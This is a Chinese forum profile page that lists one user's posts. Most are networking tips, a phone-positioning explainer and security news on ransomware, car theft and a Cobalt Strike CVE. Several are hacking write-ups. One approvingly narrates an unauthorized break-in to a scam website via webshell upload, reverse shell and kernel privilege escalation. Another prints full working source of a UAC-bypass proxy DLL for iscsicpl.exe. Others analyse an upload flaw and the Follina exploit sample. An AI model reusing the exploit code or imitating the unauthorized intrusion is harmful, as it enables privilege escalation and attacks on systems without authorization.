CHQ1d
团队成员
-
注册日期
-
上次访问
CHQ1d 发布的所有帖子
-
-
-
-
-
-
我来讲个traefik后端应用获取用户真实ip案例吧。。 我树莓派集群是使用taefik作为api网关的,因为后端有一个查询访问者ip的服务,所以必须要设置前端的traefik可以获取到用户的ip,下面是我的流量路径 外网frp服务器–>树莓派traefik服务器–>应用程序 操作 大家都知道当到了树莓派traefik这一层的时候我们就只能从请求头HTTP_X_FORWARDED_FOR获取到用户的真实ip 所以要让traefik得到用户的真实ip必须要traefik信任转发头,所以在traefik启动的时候必须要加上 --entrypoints.<name>.forwardedheaders.insecure 当中的name要用你的entrypoints名字替换了,比如我的80端口的entrypoints名字是web 443端口的entrypoints名字是websecure我就需要加 - --entrypoints.web.forwardedheaders.insecure - --entrypoints.websecure.forwardedheaders.insecure 当然traefik支持信任部分的转发头,比如你想信任本地的你可以这么做 --entryPoints.web.forwardedHeaders.trustedIPs=192.168.1.1/24
-
-
-
-
-
手机定位技术 手机定位技术是指利用GPS定位技术或者基站定位技术对手机进行定位的一种技术。基于GPS的定位方式是利用手机上的GPS定位模块将自己的位置信号发送到定位后台来实现手机定位的。基站定位则是利用基站对手机的距离的测算距离来确定手机位置的。后者不需要手机具有GPS定位能力,但是精度很大程度依赖于基站的密度,有时误差会超过一公里。前者定位精度较高。此外还有利用Wifi在小范围内定位的方式。 移动通信系统是目前用户最多、覆盖范围最广的公众通信系统,因此可考虑使用手机这一普及率很高的终端设备提供定位信息。1996 年美国联邦通信委员会(Federal Com-munications Commission,FCC)要求公众通信网应提供定位服务。在移动通信网络中,早期采用的是基于基站代码的定位技术,它由网络侧获取用户当前所在的基站信息以确定用户当前位置,定位精度取决于移动基站的分布及覆盖范围。为提高定位精度,发展了基于蜂窝电话网络的三角运算定位技术,根据手机接收到不同基站发出的信号到达该手机的时间差来计算该用户所在位置,但在基站几何条件或覆盖条件差的地区,定位效果并不理想。 [1] GPS数据 卜默示条件,GPS模块SiRFStarIII接受每二输出位置的数据,通常$GPRMC精简数据格式的数据,包括纬度,经度的目的,速度(结),运动方向角,年,月,时,分,秒,毫秒,定位数据是有效的或无效的,和其他重要信息。语句格式如下: $GPRMC,,,,,,,,,,,,*,HH 只需要知道位置信息,所以在阅读唯一的,可以实际应用。 <1>:当地时间代表UTC。格式“当每分钟,小时,分钟和秒。 <2>:工作代表国家。”“显示可用的数据,“V”表示接受警报,没有可用的数据。 <3>:代表纬度数据。“子级的格式。分分分。” <4>:纬度半球为代表的“N”或“S”。 <5>:代表经度数据。格式和LD 现状;度分钟。sub-sub-sub-sub.” <6>:代表经度半球,为“E”或“ 软件读取经纬度数据,用户位置停止分析,确定用户的具体位置在该地区建立和平。方法是基于用户的设置确定中心的纬度和经度和纬度和经度计算出活动维持当前的对象可以超过和平活动预定半径。结果的基础上的歧视,设置相应的标志。 [3] GSM技术 GSM手机定位方式通常可分为基于网络方式和基于终端方式两种。从技术上可分为到达时间 (TOA)、增强测量时间差(E-OTD)和GPS辅助(A-GPS)3种方式。 TOA定位技术 TOA定位方式可在现有的任何手机上实现,手机无需作任何改动。 具体实现步骤: (1)要定位的手机发出一已知信号,三个或多于三个LMU同时接收该信号,已知信号是手机执行异步切换时发 出的接入突发信号; (2)各LMU得到信号到达时的绝对GPS时间后,可得到相对时间差(RTD); (3)根据前两步的信息,SMLC进行两两比较,计算突发信号到达时间差(TDOA),得出精确位置, 并回到应用中。要通过三角计算得出手机精确位置,必须知道另外两个参数:LMU的地理位置和各 LMU之间的时间偏移量。例如各LMU必须提供的绝对GPS时间,或在已知位置的地点放置参考LMU可得到实际时间差(RTD)参数。 LMU用接入突发信号确定TOA。当定位请求发出时,LMU被选定,且配置正确的频率,以便接收 接入突发信号。此时,手机在业务信道(可能会处于跳频方式)上,以特定功率发送达70个接入脉 冲(时长320ms)。各LMU通过多种方式实现和改善TOA的测量结果。利用收到的突发信号可提高测 量成功概率和测量精度。采用分集技术(如天线分集和跳频),可降低多径效应的影响,提高测量 精度。当某个应用需要知晓手机位置时,该应用向SMLC发出请求,同时告知手机号码和定位精度 要 求。被测量的TOA参数及其误差值一同被采集并发送到SMLC,根据该数据,SMLC可计算出应用所需 要的手机位置,再将位置信息和误差范围发送回应用。 TOA定位方式需要附加硬件(LMU),以达到精确计算突发信号到达时间的目的。实现方式有 多 种:LMU既可集成在BTS内,也可作为单独设备。LMU作为单独设备时,既可有单独的天线,也可与 BTS共享天线,通过空中接口实现网络间通信。 E-OTD定位技术 E-OTD定位方式是从测量时间差(OTD)发展而来的,OTD指测量所得的时间量,E-OTD指测 量 的方式。手机无需附加任何硬件便可得到测量结果。对于同步网,手机测量几个BTS信号的相对到 达时间;对于非同步网,信号同时还需要被一个位置已知的LMU接收。确定了BTS到手机的信号传输时间,则可确定BTS与手机之间的几何距离,然后再根据此距离进行计算,最终确定手机的位置。 实现步骤如下: 1) 手机收到各基站发来信号,得到TOA参数;LMU得到RTD参数; 2) 手机将TOA和RTD参数 传送到GSM网。 3) OTD测量需要用同步、标准且模拟的脉冲。当BTS发送的帧未被同步时,网络需要测量BTS之间 的RTD。为了进行精确的三角测量,OTD测量和RTD测量(非同步BTS时)均需要3个BTS。获得OTD 参 数后,手机位置既可在网络中计算,也可在终端计算(要求手机具备各种必要信息)。前者称为手 机辅助方式,后者称为手机自主方式。 通过手机或网络中的位置计算功能模块,实现位置计算。 A-GPS原理 GPS辅助定位方式实现步骤如下:GSM网收到GPS辅助信息;GSM网将辅助信息发送到手机;手机得到GPS信息,计算并得出自身精确位置;手机将位置信息发送到GSM网。 该方式有手机辅助方式和手机自主方式两种: (1)手机辅助GPS定位方式 这种解决方案是将传统GPS接收器的大部分功能转移到网络处理器上实现。该方式需要天线、 RF单元和数据处理器等设备。GSM网向手机发送一串极短的辅助信息,包括时间、可视卫星清单、卫星信号多普勒参数和码相位搜索窗口。这些参数有助于内置GP S模块减少GPS信号获得时间。辅 助数据来自经手机GPS模块处理后产生的伪距离数据,且可持续数分钟。收到这些伪距离数据后, 相应的网络处理器或定位服务器能大致估算出手机的位置。GSM网增加必要的修正后,可提高定位精度。 (2)手机自主GPS定位方式 这种手机包含一个全功能的GPS接收器,具有(1)方式中手机的所有功能,再加上卫星位置 和手机位置计算功能。运算开始时,需要的数据比手机辅助方式要多,这些数据能够持续4小时以 上或根据需要进行更新,通常包括时间、参考位置、卫星星历和时间校验参数等。如果某些应用 需要更高的精度,则必须持续(间隔约30s)向手机发差分GPS(DGPS)信号。DGPS信号在非常宽 的地域范围有效,以一个参考接收器为中心可服务于较宽的地域范围。最终位置信息由手机本身 计算得到,若需 要,此定位信息可发送到其它任何应用中。 wifi定位技术 GPS难以解决室内环境下的一些定位问题,大部分室内环境下都存在WiFi,因此利用WiFi进行定位无需额外部署硬件设备,是一个非常节省成本的方法。然而WiFi并不是专门为定位而设计的,传统的基于时间和角度的定位方法并不适用于WiFi。近十年来,在室内WiFi场景下的定位中,位置指纹法被广泛研究和采用。本文对WiFi位置指纹法进行综述,提出了这个领域面临的挑战,介绍最新的研究,以及提供一些实际的指导。 介绍 室内环境下的定位一直是一个很多问题未被解决的领域。由于信号的严重衰减和多径效应,通用的室外定位设施(比如GPS)并不能在建筑物内有效地工作。定位准确性也是一个问题,GPS也许可以指出移动设备在哪一个建筑物,但是室内场景下,人们希望得到更精确的室内位置,这需要更精密的地图信息和更高的定位精度。 我们可以在室内搭建一套完整的基础设施用来定位,但是这样需要很大的代价,包括定位信号占用的频谱资源、用于感知定位信号的嵌入在移动设备中的额外硬件、安装在固定位置的用来发送定位信号的锚节点。因此,大家倾向于使用那些已有的被广泛部署的无线设备去实现室内定位。 基于无线信号的定位方法首先考虑的是使用WiFi(基于IEEE802.11标准的WLAN)作为基础定位设施。现在,包括智能手机、笔记本电脑在内的大部分移动通信设备都内嵌了WiFi模块。实际上,WiFi已经被广泛地在室外定位与导航中使用(通过智能手机以及被维护的wifi热点位置与其对应的mac地址的数据库进行查找,很多公司有维护这样的数据库,包括Google、Apple、Microsoft,以及Skyhook这样的定位服务提供商等等)。其他还有一些技术,比如用蓝牙、RFID、移动电话基站信号等,也可以用来实现室内定位,但是它们不像WiFi这样到处都有,因此流行程度不如WiFi。移动电话信号并不能在所有的室内场景下都能稳定传播,使用RFID需要额外的安装硬件的花费,此外,基于超声波的定位技术使用在一些实验性的工作中,而实际利用超市波的商用设备很少,因此实际应用并不多。 WiFi广泛使用在家庭、旅馆、咖啡馆、机场、商场等各类大型或小型建筑物内,这样使得WiFi成为定位领域中一个最引人注目的无线技术。通常,一个WiFi系统由一些固定的接入点(AP)组成,它们部署在在室内一些便于安装的位置,系统或网络管理员通常知道这些AP的位置。能连接WiFi的移动设备(比如笔记本电脑、移动电话)相互之间可以直接或间接地(通过AP)通信,因此可以考虑在通信功能外同时实现定位功能。但是WiFi信号并不是为定位而设计的,通常是单天线、带宽小,室内复杂的信号传播环境使得传统的基于到达时间/到达时间差(TOA/TDOA)的测距方法难以实现,基于到达信号角度的方法也同样难以实现,如果在WiFi网络中安装能定向的天线又需要额外的花费。因此,近年来大家详细研究的主要是位置指纹方法。
-
-
-
加密货币和勒索软件在数字世界中都不是什么新鲜事。两人都在那里待了很长时间,这足以让他们找到开始他们关系的共同点。 勒索软件就像一辆虚拟汽车,适用于所有类型的燃料,而加密是目前最推荐的一种。没有人可以说 2020 年是网络世界中的勒索软件之年,但这并不是因为网络犯罪分子选择勒索软件只是因为他们知道如何正确攻击。这是因为今年加密货币大部分上涨,以及数字世界的新常态。由于可以使用加密货币进行匿名支付,这为他们提供了坚持使用勒索软件的新理由。 勒索软件如何运作? 勒索软件是一种恶意软件类型,它会加密受害者的文件,无论是随机用户还是组织,都会导致他们拒绝访问其个人设备上的这些文件。 获得访问权限的关键是向攻击者支付赎金。 加密货币如何帮助传播勒索软件? 现在我们都知道,所有的加密交易对于接收者和发送者都是不可追踪的,我们称之为整个匿名交易。近年来对加密货币的需求增加使得买卖这些虚拟硬币并获得实际资金变得更加容易。 话虽如此,加密货币成为网络犯罪分子在不被追踪的情况下获取赎金并让这些组织访问其文件的最首选方式(如果不是最好的话)。 如何避免参与勒索软件派对? 互联网上的大多数文章都会教您如何以最小的损失向犯罪分子提供赎金,并且不会出错,以确保您找回文件。但问题是,当您可以避免首先遇到犯罪分子及其病毒时,为什么还要学习如何向犯罪分子付款? 有多种方式可以为您提供大量的保护。 从参加我们称之为终极保护层的网络安全意识培训课程开始,然后是多层,例如在 DNS 级别上工作的第一个也是最有价值的层,这是您与网络犯罪分子之间的第一道关口。 每次您尝试通过包含病毒的网站运行时,强大的 DNS 保护都会简单地转动您的方向盘。它还将阻止大多数黑客参与的所有加密和采矿网站。 有什么例子吗? 绝对地。 DarkSide 勒索软件。它的活跃操作发生在 2020 年。它的主要特点是它不仅加密了受害者的数据,而且还将其从受影响的服务器中删除。这是此类威胁的特征之一。 在不到一年的工作时间里,用比特币支付了大约 1 亿美元。敲诈者仅通过攻击两家公司就获得了大约 1000 万美元。 Brenntag 公司经销化学品。在这种情况下,DarkSide 的犯罪伙伴表示,他们在购买被盗信息后获得了网络访问权限,但不知道一开始是如何获得凭据的。该公司支付了 440 万美元的加密货币赎金。支付赎金后,Brenntag 获得了加密文件的解密器,并成功阻止了网络犯罪分子公开公司被盗信息。 第二家公司是Colonial Pipeline。殖民地管道是美国最大的成品油管道系统 在得知它是“网络安全攻击的受害者”后,管道运营商使一些系统下线,暂时停止了管道运营和几个 IT 系统。它还联系了一家外部网络安全公司进行调查。最后,他们向黑客支付了近 500 万美元的加密货币,以换取用于恢复系统的解密密钥。 Conti 勒索软件。这种勒索的主要受害者是医疗机构。它通常使用网络钓鱼攻击来远程访问计算机并在网络上进一步传播,同时窃取凭据并收集未加密的数据。最著名的攻击是对爱尔兰卫生服务执行官的攻击,在此期间,该团伙以未披露收到的数据为由勒索了约 2000 万美元的加密货币。
-
法国执法部门与西班牙和拉脱维亚合作,破坏了一个网络犯罪团伙,该团伙利用黑客工具窃取汽车,而无需使用实体密钥卡。 欧洲刑警组织在一份新闻声明中说: “犯罪分子以无钥匙进入和启动系统的车辆为目标,利用该技术进入汽车并开走。” 这项协调行动于 2022 年 10 月 10 日进行,导致来自三个国家 22 个地点的 31 名嫌疑人被捕,其中包括软件开发商、其经销商以及使用该工具闯入车辆的偷车贼。 作为逮捕行动的一部分,官员们还没收了价值 1,098,500 欧元的犯罪资产,更不用说据称在网上宣传该服务的互联网域名了。 根据欧洲刑警组织的说法,据说犯罪分子已经从两家未具名的法国汽车制造商那里挑选出无钥匙车辆。然后,犯罪者使用欺诈包替换原始软件,将其作为“汽车诊断解决方案”进行营销。 安装后,该工具可以在没有钥匙的情况下打开车门并启动点火装置。该机构没有透露更多关于攻击是如何进行的细节。 Eurojust 在一份独立新闻稿中指出,有组织犯罪集团“使用欺诈软件通过复制车辆的点火钥匙来盗窃车辆”,并补充说“超过 1 亿欧元,以及 12 个银行账户、房地产和 3豪华汽车在法国被查获。” 欧洲刑警组织进一步表示,调查由法国宪兵网络犯罪中心 (C3N) 发起,欧盟范围内的执法机构自 2022 年 3 月起协助此案。
-
Cobalt Strike 软件平台背后的公司 HelpSystems 发布了一个带外安全更新,以解决远程代码执行漏洞,该漏洞可能允许攻击者控制目标系统。 Cobalt Strike 是一个商业红队框架,主要用于对手模拟,但该软件的破解版本已被勒索软件运营商和以间谍活动为重点的高级持续威胁 (APT) 团体等积极 滥用。 后利用工具包括一个团队服务器,它充当命令和控制 (C2) 组件,以及一个信标,这是用于创建与团队服务器的连接并丢弃下一阶段有效负载的默认恶意软件。 该问题被跟踪为CVE-2022-42948,影响 Cobalt Strike 版本 4.7.1,并且源于 2022 年 9 月 20 日发布的一个不完整的补丁,以纠正跨站点脚本 ( XSS ) 漏洞 ( CVE-2022-39197 )这可能导致远程代码执行。 IBM X-Force 研究人员 Rio Sherri 和 Ruben Boonen说: “XSS 漏洞可以通过操纵一些客户端 UI 输入字段、模拟 Cobalt Strike 植入物签入或通过挂钩在主机上运行的 Cobalt Strike 植入物来触发。”在一篇文章中。 但是,发现在特定情况下可以使用Java Swing 框架触发远程代码执行,该框架是用于设计 Cobalt Strike 的图形用户界面工具包。 “Java Swing 中的某些组件会自动将任何以 <html> 开头的文本解释为 HTML 内容,”HelpSystems 的软件开发经理 Greg Darwin 在一篇文章中解释道。“在整个客户端禁用 html 标签的自动解析就足以缓解这种行为。” 这意味着恶意行为者可以通过HTML <object> 标签利用此行为,利用它加载托管在远程服务器上的自定义有效负载,并将其注入到注释字段以及 Cobalt 中的图形文件浏览器菜单中打击用户界面。 “这里应该指出,这是一个非常强大的利用原语,”IBM 研究人员说,并补充说它可以用来“构建一个功能齐全的跨平台有效负载,无论操作如何,都能够在用户机器上执行代码系统风格或架构。” 一周多前,美国卫生与公众服务部 (HHS)警告称,在针对医疗保健行业的攻击中,Cobalt Strike 等合法工具将继续被武器化。
-
-
一、前言 简单的描述一下,有天因为很无聊,又想日点非法的网站,于是我就到反诈骗贴吧去逛了一圈,看能不能找到一些诈骗网站来操作一下,简简单单的翻了一下,立马锁定一个目标站,因为它后台是弱口令,哈哈哈!然后就有了接下来的操作,请往下看,但是之前有的没有截图,现在域名也不能访问了,不重要,来看思路! 二、渗透 信息收集 (1)因为一开始获取到了后台的弱口令,但是在后台中,发现并没有什么可以利用的地方,然后开始扫描二级域名、ip、目录等等,总体筛选下来发现有几个二级域名是客服聊天系统,然后尝试能否爆破,结果有验证码,不能绕过。 (2)陷入一丝困境,但是猛然发现辰光客服系统,随后丢到百度,看是否有开源系统,准备代码审计一波,结果突然看见一条这么个信息,然后点进去看了看,嗯!尝试!! 漏洞利用 (1)大概看了下这个漏洞是存在未授权上传漏洞,然后开始验证此战是否存在未授权上传漏洞,果不其然,存在此漏洞 (2)开始构造exp,非常简单 (3)成功上传php小马,并Getshell,接下来就进一步分析,看见一群网站,都分别打开看了下,全是各种各样的诈骗网站 提权 (1)先生成linux木马,反弹shell到msf上,因为是外网,别忘了出网,再查看下当前权限 (2)收集下内核信息 (3)使用了很多内核提权的模块都没有成功,然后在尝试了一下今年的模块,然后成功提权 http://image.g3et.cn/13_1638197820678.png (4)查看一下它宝塔的信息,发现诈骗金额真的数大… http://image.g3et.cn/微信截图_20211109181013_1638197935699.pnghttp://image.g3et.cn/微信截图_20211109181423_1638197935704.png 最后 截止整个渗透算完成了,写的比较简单潦草,因为明天要上班,就随便写了写,也过了一个月才写这篇文章,之后详细写写所有的经验,目前这个域名已经无法访问,希望不要再有那么多人受骗了
-
-
前言 hw的时候遇到的,结束后复现找了一下漏洞代码 正文 漏洞url: /dcs.web/upload?convertType=19&isSourceDir=0 文档说明 upload处理点 config.inputDir.getPath()获取config.properties里的dir.input,然后设置了三个属性值: * fname - 文件名 * finput - 文件上传后的路径 * sourceRelativepath - 生成的UUID 文件写入到input目录后,返回json请求/convert进行处理 首先调用buildParam函数进行处理 获取convertType参数,然后转换成int类型。传入EnumConvertType.getEnum判断值是否存在hash表里 经过获取一些请求参数后,然后来到 String lowrealInput = realInput.toLowerCase() 往上跟踪发现取finput属性,获取inputDir,outputDir,zipFileName,zipOutput请求参数。然后进行判断,由于请求都没有带到这些参数所以去到finput 然后进入大判断,判断lowrealInput尾部是否存在对应的后缀,并将EnumConvertType设置为对应的hash表key 然后去到284行,获取fname,fileName属性的值。判断fileName不为空调用setFIleName函数。设置this.fileName,然后获取compressedSuffix请求参数,最后判断enumType不为空调用updateFilePath函数 updateFilePath函数 后面就是对一些请求参数转int进行设置 回到ConvertParamBuilder.class,经过checkParam函数判断是不是pdf,然后单独开个线程处理然后生成json调用getJsonResult函数 getJsonResult函数 getResultDate函数生成返回的url ZipService.zipfile函数,先获取tmpDir目录然后调用copyDirectiory函数将input目录下上传的文件copy到out目录。最后调用zip函数 zip函数如下 zip函数 引用一张图 参考链接:https://saucer-man.com/information_security/364.html
-
正文 lnk:https://www.ddosi.org/iscsicpl-bypassuac/ poc:https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC/archive/refs/heads/main.zip c:\Windows\syswow64\iscsicpl.exe缺少iscsiexe.dll和iscsiexe_org.dll sigcheck检测,autoElevate为true。进程权限自提升 翻看代码,作者修改了注册表的HKEY_CURRENT_USER\Environment Path的键值为当前用户的TMP目录。看了一下这个注册表的键值和PATH环境变量最后一个路径对应,修改该注册表相当于直接动环境变量路径最后一个路径 HKEY_CURRENT_USER\Environment注册表路径参考链接:https://baike.baidu.com/item/%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F/1730949 (当然也可以直接修改windir环境变量,然后dll丢到对应目录) 重复说一下DLL加载顺序 直接加载iscsiexe.dl,会报缺少来自iscsiexe_org.dll的SvchostPushServiceGlobals、ServiceMain、DiscpEstablishServiceLinkage外部导出函数。 github上poc的dll code (DLL外部函数转发) // iscsiexe.cpp, the payload DLL executed by iscsicpl.exe #include "pch.h" #include <windows.h> #include <stdio.h> #include <tchar.h> #include "resource.h" #pragma pack(1) // LoadString() for linker #pragma comment(lib,"User32.lib") #define MAX_ENV_SIZE 32767 BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { static HINSTANCE hL; LPWSTR pCMD = new WCHAR[MAX_ENV_SIZE]; char pACMD[MAX_ENV_SIZE]; switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: WinExec("C:\\Windows\\System32\\cmd.exe", SW_SHOW); //hL = LoadLibrary(_T(".\\iscsiexe_org.dll")); /* if (!hL) return false; // execute the command string from the module resource section LoadString(GetModuleHandle(L"iscsiexe.dll"), IDS_CMD101, pCMD, MAX_ENV_SIZE); WideCharToMultiByte(CP_ACP, 0, pCMD, wcslen(pCMD), pACMD, MAX_ENV_SIZE, NULL, NULL); WinExec(pACMD, SW_SHOW); */ break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: FreeLibrary(hL); break; } return TRUE; } // the proxy DLL mappings for the linker #pragma comment(linker, "/export:SvchostPushServiceGlobals=iscsiexe_org.SvchostPushServiceGlobals") #pragma comment(linker, "/export:ServiceMain=iscsiexe_org.ServiceMain") #pragma comment(linker, "/export:DiscpEstablishServiceLinkage=iscsiexe_org.DiscpEstablishServiceLinkage") 原作者iscsiexe_org.dll生成过程(搞的和他妈自解压马一样,醉了) * 利用FindResource函数搜索当前进程搜索DLL资源,寻找102资源获取句柄 * LoadResource搜索对应资源获取句柄 * SizeofResource检索指定资源的大小 * LockResource检索指向内存中指定资源的指针 * 然后遍历对应DLL资源,改名为 iscsiexe_org.dll VT查杀:https://www.virustotal.com/gui/file/60004318d9a509e5bad2bda71dd11bcc0304dabe17b30a85366a73ad532aae80 稍微搜了一下,dll可能是这里下的:https://www.dll-files.com/iscsiexe.dll.html win7测试 win10测试
-
近期新爆出的漏洞office的day,利用msdt+远程加载 CVE:CVE-2022-30190 样本地址:https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/# 简单分析 无VBA,远程加载 doc改名zip解压,搜索远程加载的地址定位到word_rels\document.xml.rels 通过查看app.any.run沙箱捕获的请求地址内容,查看如下 中间的内容是一段powershell,解码后如下 <!doctype html> <html lang="en"> <body> <script> //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 